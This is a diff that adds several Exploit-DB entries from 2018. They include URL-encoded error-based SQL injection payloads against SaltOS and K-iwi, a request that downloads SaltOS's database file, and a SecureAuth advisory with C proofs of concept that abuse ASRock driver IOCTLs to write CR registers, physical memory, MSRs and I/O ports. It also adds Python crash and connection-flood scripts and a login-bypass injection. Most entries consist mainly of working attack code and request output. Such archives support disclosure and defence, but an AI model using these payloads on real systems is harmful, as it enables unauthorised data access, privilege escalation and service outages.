+action=ajax&query=numbers&page=usuarios&action2=list%27%29%20%61%6e%44%20%28%53%45%4c%65%63%74%20%31%35%35%20%46%72%6f%4d%28%53%45%4c%45%43%54%20%43%4f%75%6e%74%28%2a%29%2c%43%4f%6e%63%61%54%28%63%6f%6e%43%41%54%28%30%78%32%30%33%61%32%30%2c%55%73%65%52%28%29%2c%44%61%74%41%42%41%53%45%28%29%2c%56%45%72%53%49%6f%4e%28%29%29%2c%30%78%37%65%2c%28%73%65%6c%65%43%54%20%28%65%6c%54%28%31%35%35%3d%31%35%35%2c%31%29%29%29%2c%30%78%34%39%36%38%37%33%36%31%36%65%32%30%35%33%36%35%36%65%36%33%36%31%36%65%2c%66%6c%6f%4f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%66%72%4f%4d%20%49%4e%46%6f%72%6d%41%54%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%4c%75%67%49%4e%53%20%47%72%6f%55%50%20%42%59%20%78%29%61%29%20%41%6e%64%20%28%27%45%66%65%27%3d%27%45%66%65&id=0: undefined +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:12:53 GMT +Server: Apache/2.4.4 (Win32) OpenSSL/0.9.8y PHP/5.4.16 +X-Powered-By: SaltOS v3.1 r8126 +Expires: -1 +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Vary: Accept-Encoding +Connection: keep-alive, close +Content-Type: text/html;charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/45734.txt b/exploits/php/webapps/45734.txt new file mode 100644 index 000000000..76e702674 --- /dev/null +++ b/exploits/php/webapps/45734.txt @@ -0,0 +1,47 @@ +# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - Database File Download +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.saltos.org/ +# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32 +# Version: 3.1 r0 / 3.x +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18762 + +# POC: +# 1) +# http://localhost/[PATH]/files/saltos.db +# +# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2853 [200]: /index.php?action=logout +# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2856 [200]: / +# [Mon Oct 29 00:05:51 2018] 127.0.0.1:2857 [200]: /files/saltos.db +# +GET /files/saltos.db HTTP/1.1 +Host: localhost:57187 +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=a06furpg1gf54hqf573l886qs3; lang=es_ES; __lang__=1543317075; style=blue; __style__=1543317075; iconset=silk; __iconset__=1543317075 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Host: localhost:57187 +Connection: close +Content-Type: application/octet-stream +Content-Length: 8462336 + +query('SELECT * FROM tbl_usuarios'); + +while ($p = $sonuc->fetchArray()) {?> + +

+

+ + \ No newline at end of file diff --git a/exploits/php/webapps/45735.txt b/exploits/php/webapps/45735.txt new file mode 100644 index 000000000..4c72c2480 --- /dev/null +++ b/exploits/php/webapps/45735.txt @@ -0,0 +1,59 @@ +# Exploit Title: K-iwi Framework 1775 - SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.k-iwi.com/ +# Software Link: https://sourceforge.net/projects/k-iwi/files/latest/download +# Version: 1775 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18755 + +# POC: +# 1) +# http://localhost/[PATH]/index.php?route=admin/user/group/update&token=&user_group_id=[SQL] +# +GET /[PATH]/index.php?route=admin/user/group/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_group_id=1%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:45:01 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; path=/ +Set-Cookie: language=it_IT; expires=Sun, 25-Nov-2018 17:56:01 GMT; Max-Age=2592000; path=/; domain=192.168.1.27 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1105 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?route=admin/user/user/update&token=&user_id=[SQL] +# +GET /[PATH]/index.php?route=admin/user/user/update&token=036aefc8aabf2ac8f6a4687ce432905d&user_id=11%39%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3sm3nbn5lero2rag4hj69ld3d0; language=it_IT +Connection: keep-alive +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:52:50 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1105 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/dos/45716.txt b/exploits/windows/dos/45716.txt new file mode 100644 index 000000000..61cd44301 --- /dev/null +++ b/exploits/windows/dos/45716.txt @@ -0,0 +1,503 @@ +SecureAuth - SecureAuth Labs Advisory +http://www.secureauth.com/ + +ASRock Drivers Elevation of Privilege Vulnerabilities + +1. *Advisory Information* + +Title: ASRock Drivers Elevation of Privilege Vulnerabilities +Advisory ID: CORE-2018-0005 +Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities +Date published: 2018-10-25 +Date of last update: 2018-10-25 +Vendors contacted: ASRock +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed +IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with +Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient +Access Control [CWE-782] +Impact: Code execution +Remotely Exploitable: No +Locally Exploitable: Yes +CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712 + +3. *Vulnerability Description* + +ASRock's website states that [1]: + +ASRock Inc. is established in 2002, specialized in the field of +motherboards. With the 3C design concept, Creativity, Consideration, +Cost-effectiveness, the company explores the limit of motherboards +manufacturing while paying attention on the eco issue at the same +time, developing products with the consideration of eco-friendly +concept. ASRock has been growing fast and become world third largest +motherboard brand with headquarter in Taipei, Taiwan and branches in +Europe and the USA. + +ASRock offers several utilities designed to give the user with an ASRock +motherboard more control over certain settings and functions. +These utilities include various features like the RGB LED control, +hardware monitor, fan controls, and overclocking/voltage options. + +Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys +low level drivers, installed by ASRock RGBLED and other ASRock branded +utilities, which could allow a local attacker to elevate privileges. + +4. *Vulnerable Packages* + + . ASRock RGBLED before v1.0.35.1 + . A-Tuning before v3.0.210 + . F-Stream before v3.0.210 + . RestartToUEFI before v1.0.6.2 + +5. *Vendor Information, Solutions and Workarounds* + +ASRock published the following fixed applications for each of its +motherboards models: + + . ASRock RGBLED v1.0.36 + . A-Tuning v3.0.216 + . F-Stream v3.0.216 + . RestartToUEFI v1.0.7 + +Downloads are available on the ASRock website. + +6. *Credits* + +These vulnerabilities were discovered and researched by Diego Juarez. +The publication of this advisory was coordinated by Leandro Cuozzo +from SecureAuth Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others, +use a low level driver to program and query the status on embedded ICs +on their hardware. Fan curves, clock frequencies, LED colors, thermal +performance, and other user customizable properties and monitoring +functionality are exposed to applications through this low level kernel +driver. + +The main subjects of this advisory are the device drivers +installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys). +>From now on addressed as "AsrDrv". Default installation allows +non-privileged user processes (even running at LOW INTEGRITY) to get a +HANDLE and issue IOCTL codes to the driver. + +The following sections describe the problems found. + +7.1. *CR register access* + +[CVE-2018-10709] + +AsrDrv exposes functionality to read and write CR register values. This +could be leveraged in a number of ways to ultimately run code with +elevated privileges. + +/----- +// Asrock RGBLED PoC demonstrating non-privileged access to CR registers + +#include +#include + +#define IOCTL_ASROCK_READCR 0x22286C +#define IOCTL_ASROCK_WRITECR 0x222870 + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_CR_STRUCT { + ULONG64 reg; + ULONG64 value; +} ASROCK_CR_STRUCT; + +#pragma pack(pop) + +#define IOCTLMACRO(iocontrolcode, size) \ + ULONG64 outbuffer[2] = { 0 }; \ + DWORD returned = 0; \ + DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ + return outbuffer[1]; \ + +ULONG64 ASROCK_ReadCR(DWORD reg) +{ + ASROCK_CR_STRUCT inbuffer = { 3, 0}; + IOCTLMACRO(IOCTL_ASROCK_READCR, 10) +} + +ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value) +{ + ASROCK_CR_STRUCT inbuffer = { reg, value}; + IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10) +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char* argv[]) +{ + printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n"); + + if (!InitDriver()) { + printf("InitDriver failed! - aborting...\n"); + exit(0); + } + + ULONG64 a = ASROCK_ReadCR(3); + printf("CR3 (PageDir): %llx\n", a); + printf("press ENTER for instant system CRASH\n"); + getchar(); + + a = ASROCK_WriteCR(3, 0xffff1111ffff2222); + + CloseHandle(ghDriver); +} +-----/ + +7.2. *Arbitrary physical memory read/write* + +[CVE-2018-10710] + +AsrDrv's IOCTL code 0x22280C exposes a functionality to read and write +arbitrary physical memory, this could be leveraged by a local attacker +to elevate privileges. + +Proof of Concept: + +/----- +// Asrock RGBLED PoC (arbitrary physical memory write) +// This PoC demonstrates arbitrary write to physical memory. + +#include +#include + +#define IOCTL_ASROCK_WRITEPH 0x22280C + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_PH_STRUCT { + ULONG64 destPhysical; + DWORD size; + DWORD unk0; + ULONG64 src; +} ASROCK_PH_STRUCT; + +#pragma pack(pop) + +BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size) +{ + ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src}; + + BYTE outbuffer[0x30] = { 0 }; + + DWORD returned = 0; + DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); + if (returned) { + return TRUE; + } + return FALSE; +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char * argv[]) +{ + printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n"); + if (!InitDriver()) { + exit(0); + } + + printf("press ENTER for SYSTEM CRASH\n"); + getchar(); + ULONG64 data = 0xFFFF1111FFFF2222; + for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) { + printf("."); + ASROCK_ph_memcpy(i, (ULONG64)&data, 8); + } + + CloseHandle(ghDriver); + return 0; +} +-----/ + +7.3. *MSR Register access* + +[CVE-2018-10711] + +AsrDrv exposes functionality to read and write Machine Specific +Registers (MSRs). This could be leveraged to execute arbitrary ring-0 +code. + +Proof of Concept: + +/----- +// Asrock RGBLED PoC demonstrating non-privileged access to MSR registers + +// This PoC demonstrates non privileged MSR access by reading +// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR) +// and then writing garbage to it (instant BSOD!) + +#include +#include + +#define IOCTL_ASROCK_RDMSR 0x222848 +#define IOCTL_ASROCK_WRMSR 0x22284C + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_MSRIO_STRUCT { + ULONG64 valLO; // + DWORD reg; // + ULONG64 valHI; // +} ASROCK_MSRIO_STRUCT; + +#pragma pack(pop) + +#define IOCTLMACRO(iocontrolcode, size) \ + ASROCK_MSRIO_STRUCT outbuffer = { 0 };\ + DWORD returned = 0; \ + DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL); \ + return (outbuffer.valHI<<0x20 | outbuffer.valLO); \ + +ULONG64 GIO_RDMSR(DWORD reg) +{ + ASROCK_MSRIO_STRUCT inbuffer = { 0, reg }; + IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20) +} + +ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value) +{ + ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 }; + IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20) +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char * argv[]) +{ + printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n"); + + if (!InitDriver()) { + printf("InitDriver failed! - aborting...\n"); + exit(0); + } + + ULONG64 a = GIO_RDMSR(0xC0000082); + printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a); + printf("press ENTER for instant BSOD\n"); + getchar(); + + a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222); + return (int)CloseHandle(ghDriver); +} +-----/ + +7.4. *Port mapped I/O access* + +[CVE-2018-10712] + +AsrDrv exposes functionality to read/write data from/to IO ports. This +could be leveraged in a number of ways to ultimately run code with +elevated privileges. + +/----- +// Asrock RGBLED PoC demonstrating non-privileged access to IO ports + +#include +#include + +#define IOCTL_ASROCK_PORTREADB 0x222810 +#define IOCTL_ASROCK_PORTWRITEB 0x222814 + +HANDLE ghDriver = 0; + +#pragma pack (push,1) + +typedef struct _ASROCK_CR_STRUCT { + DWORD port; + ULONG64 value; +} ASROCK_CR_STRUCT; + +#pragma pack(pop) + +#define IOCTLMACRO(iocontrolcode, size) \ + BYTE outbuffer[0x10] = { 0 }; \ + DWORD returned = 0; \ + DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ + return outbuffer[1]; \ + +BYTE ASROCK_ReadPortB(DWORD port) +{ + ASROCK_CR_STRUCT inbuffer = { port, 0}; + IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10) +} + +BYTE ASROCK_WritePortB(DWORD port, ULONG64 value) +{ + ASROCK_CR_STRUCT inbuffer = { port, value}; + IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10) +} + +void Reboot() +{ + BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6; + ASROCK_WritePortB(0xcf9, cf9 | 2); + Sleep(50); + ASROCK_WritePortB(0xcf9, cf9 | 0xe); + Sleep(50); +} + +BOOL InitDriver() +{ + char szDeviceName[] = "\\\\.\\AsrDrv101"; + ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (ghDriver == INVALID_HANDLE_VALUE) { + printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError()); + return FALSE; + } + return TRUE; +} + +int main(int argc, char * argv[]) +{ + printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n"); + + if (!InitDriver()) { + printf("InitDriver failed! - aborting...\n"); + exit(0); + } + + Reboot(); + return (int)CloseHandle(ghDriver); +} +-----/ + +8. *Report Timeline* +2018-03-12: SecureAuth sent an initial notification to ASRock America +Support. +2018-03-13: ASRock confirmed the receipt and requested additional +information in order to send it to its HQ. +2018-03-13: SecureAuth answered saying that a draft advisory has been +written, including a technical description, and requested for PGP keys +in order to send it encrypted. +2018-03-14: ASRock answered asking for the advisory in clear text. +2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text +form. +2018-03-14: ASRock confirmed the receipt and informed they would submit +it to the HQ for validation. +2018-03-23: SecureAuth requested a status update on the case. +2018-03-23: ASRock answered saying they didn't have a reply from HQ. +2018-03-26: ASRock notified SecureAuth they were still checking the +reported vulnerabilities and requested additional time. +2018-03-27: SecureAuth thanked the status update and informed ASRock +that would be in contact the following week. +2018-03-28: ASRock informed SecureAuth they checked the reported +vulnerabilities and they would have a preliminary schedule for the fix +at the end of April. +2018-03-28: SecureAuth thanked ASRock's reply. +2018-04-20: ASRock notified that the driver was modified and sent to +SecureAuth the fixed applications and requested for a feedback. +2018-04-23: SecureAuth acknowledged the reception of the fixed +applications. +2018-05-09: SecureAuth tested the modified driver and verified that the +issues detailed in the proofs of concept were solved. +For that reason, SecureAuth propose release date to be May 23rd. +2018-05-09: ASRock thanked SecureAuth's update and forwarded the +proposal to its HQ for a confirmation. +2018-05-15: ASRock notified SecureAuth that they were going to deploy +the new driver architecture into each ASRock utility. +For the whole project, ASRock estimated to finish by the end of June. +2018-05-15: SecureAuth thanked ASRock's update and asked if ASRock had +planned to release a security note. +2018-05-23: ASRock informed that each utility would include a release +note with a security description. +2018-06-15: SecureAuth requested ASRock a status update about its +timescale. +2018-06-09: ASRock forwarded the request to its HQ. +2018-06-19: ASRock informed that they had started to upload the fixed +drivers for one of the supported motherboard series +and they were going to continue uploading the drivers for other models. +2018-07-11: SecureAuth requested ASRock a status update. +2018-07-11: ASRock replied saying they were still working on the upload +process. +2018-08-06: SecureAuth requested ASRock a new status update. +2018-08-16: ASRock notified SecureAuth they had finished with the update +process. +2018-10-17: SecureAuth set October 25th as the publication date. +2018-10-25: Advisory CORE-2018-0005 published. + +9. *References* + +[1] http://www.asrock.com/ + +10. *About SecureAuth Labs* + +SecureAuth Labs, the research arm of SecureAuth Corporation, is charged +with anticipating the future needs and requirements for information +security technologies. We conduct research in several important areas of +computer security, including identity-related attacks, system +vulnerabilities and cyber-attack planning. Research includes problem +formalization, identification of vulnerabilities, novel solutions and +prototypes for new technologies. We regularly publish security +advisories, primary research, technical publications, research blogs, +project information, and shared software tools for public use at +http://www.secureauth.com. + +11. *About SecureAuth* + +SecureAuth is leveraged by leading companies, their employees, their +customers and their partners to eliminate identity-related breaches. +As a leader in access management, identity governance, and penetration +testing, SecureAuth is powering an identity security revolution by +enabling people and devices to intelligently and adaptively access +systems and data, while effectively keeping bad actors from doing harm. +By ensuring the continuous assessment of risk and enablement of trust, +SecureAuth's highly flexible Identity Security Automation (ISA) platform +makes it easier for organizations to prevent the misuse of credentials +and exponentially reduce the enterprise threat surface. To learn more, +visit www.secureauth.com, call (949) 777-6959, or email us at +info@secureauth.com + +12. *Disclaimer* + +The contents of this advisory are copyright (c) 2018 SecureAuth, and are +licensed under a Creative Commons Attribution Non-Commercial Share-Alike +3.0 (United States) License: +http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \ No newline at end of file diff --git a/exploits/windows/dos/45732.txt b/exploits/windows/dos/45732.txt new file mode 100644 index 000000000..153cfb2ac --- /dev/null +++ b/exploits/windows/dos/45732.txt @@ -0,0 +1,27 @@ +# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.modbustools.com/ +# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe +# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe +# Version: 7.0.0 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18759 + +# POC: +# 1) +# F3 & Connection / Connect / Registration Key + +#!/usr/bin/python + +buffer = "A" * 603 +try: + f=open("sie.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45705.py b/exploits/windows_x86-64/dos/45705.py new file mode 100755 index 000000000..3c9dccc6f --- /dev/null +++ b/exploits/windows_x86-64/dos/45705.py @@ -0,0 +1,25 @@ +# Exploit Title: Navicat 12.0.29 - 'SSH' Denial of Service (PoC) +# Author: Rafael Alfaro +# Discovery Date: 2018-10-27 +# Vendor Homepage: https://www.navicat.com/es/ +# Software Link : https://www.navicat.com/es/download/navicat-premium +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 7 x64 en, Windows 10 Home x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python Navicat-SSH.py +# 2.- Open navicat.txt and copy content to clipboard +# 3.- Open navicat.exe +# 4.- Click "Conexion" and select "MySQL..." +# 5.- In the "General" tab, give a name to the connection in "Nombre de Conexion" (i. e. conexion1). +# 6.- In the "SSH" tab check "Uso de tunel SSH", then set and IP address to the "Host" textbox (i. e. 127.0.0.1) and write down a username in "Nombre de usuario" (i. e. admin). +# 7.- Be sure that "Metodo de autentificacion" is set to "Contrasena" and finally paste Clipboard in "Contrasena". +# 8.- Click "Aceptar". +# 9.- Crashed! + +# !/usr/bin/env python Navicat-SSH.py + +buffer = "\x41" * 5000 +f = open("navicat.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45708.py b/exploits/windows_x86-64/dos/45708.py new file mode 100755 index 000000000..0060be1d7 --- /dev/null +++ b/exploits/windows_x86-64/dos/45708.py @@ -0,0 +1,22 @@ +# Exploit Title: AlienIP 2.41 - Denial of Service (PoC) +# Author: Arturo de la Cruz Tellez +# Discovery Date: 2018-10-17 +# Vendor Homepage: http://www.armcode.com +# Tested Version: 2.41 +# Tested on OS: Microsoft Windows 10 Home Single Language x64 +# Versión 10.0.10240 compilación 10240 + +# PoC +# Steps to produce the crash +# 1.- Run python code : python AlienIP2.41.py +# 2.- Open AlienIP2.41.txt and copy context to clipboard +# 3.- Open AlienIP.exe +# 4.- Paste clipboard on IP address or Country +# 5.- Click in Locate host +# 5.- Enter +# 6.- Crashed alienip.exe dejo de funcionar + +buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69 +f = open ("AlienIP2.41.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45711.py b/exploits/windows_x86-64/dos/45711.py new file mode 100755 index 000000000..2aab9a546 --- /dev/null +++ b/exploits/windows_x86-64/dos/45711.py @@ -0,0 +1,46 @@ +# Exploit Title: Local Server 1.0.9 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.ujang-rohidin.blogspot.com/ +# Software Link: https://sourceforge.net/projects/local-server/files/latest/download +# Version: 1.0.9 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18756 + +# POC: +# 1) + +#!/usr/bin/python +import socket + +print """ + \\\|/// + \\ - - // + ( @ @ ) + ----oOOo--(_)-oOOo---- + Local Server 1.0.9 Dos + Ihsan Sencan + ---------------Ooooo---- + ( ) + ooooO ) / + ( ) (_/ + \ ( + \_) +""" +Ip = raw_input("[Ip]: ") +Port = 4008 # Default port + +d=[] +c=0 +while 1: + try: + d.append(socket.create_connection((Ip,Port))) + d[c].send("DOOM") + print "Sie!" + c+=1 + except socket.error: + print "+ Done! +" + raw_input() + break \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45709.vb b/exploits/windows_x86-64/local/45709.vb new file mode 100644 index 000000000..b5ad5472a --- /dev/null +++ b/exploits/windows_x86-64/local/45709.vb @@ -0,0 +1,57 @@ +# Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip +# Version: 1.0 +# Category: Windows +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18806 + +# POC: +# 1) + +User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||' +Pass: Null + +# POC: +# 2) +# User: 'or 1=1 or ''=' +# Pass: Null +# +# https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png +# +#[PATH]/include/user.vb / 28 / '" & username & "' +#.... +#24 Public Sub login(ByVal username As Object, ByVal pass As Object) +#25 Try +#26 +#27 con.Open() +#28 reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')") +#29 +#30 +#31 If dt.Rows.Count > 0 Then +#32 +#33 If dt.Rows(0).Item("Role") = "Administrator" Then +#34 MsgBox("Welcome " & dt.Rows(0).Item("Role")) +#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname") +#36 Form1.LogoutToolStripMenuItem.Text = "Logout" +#37 visibleMenu("true", "admin") +#38 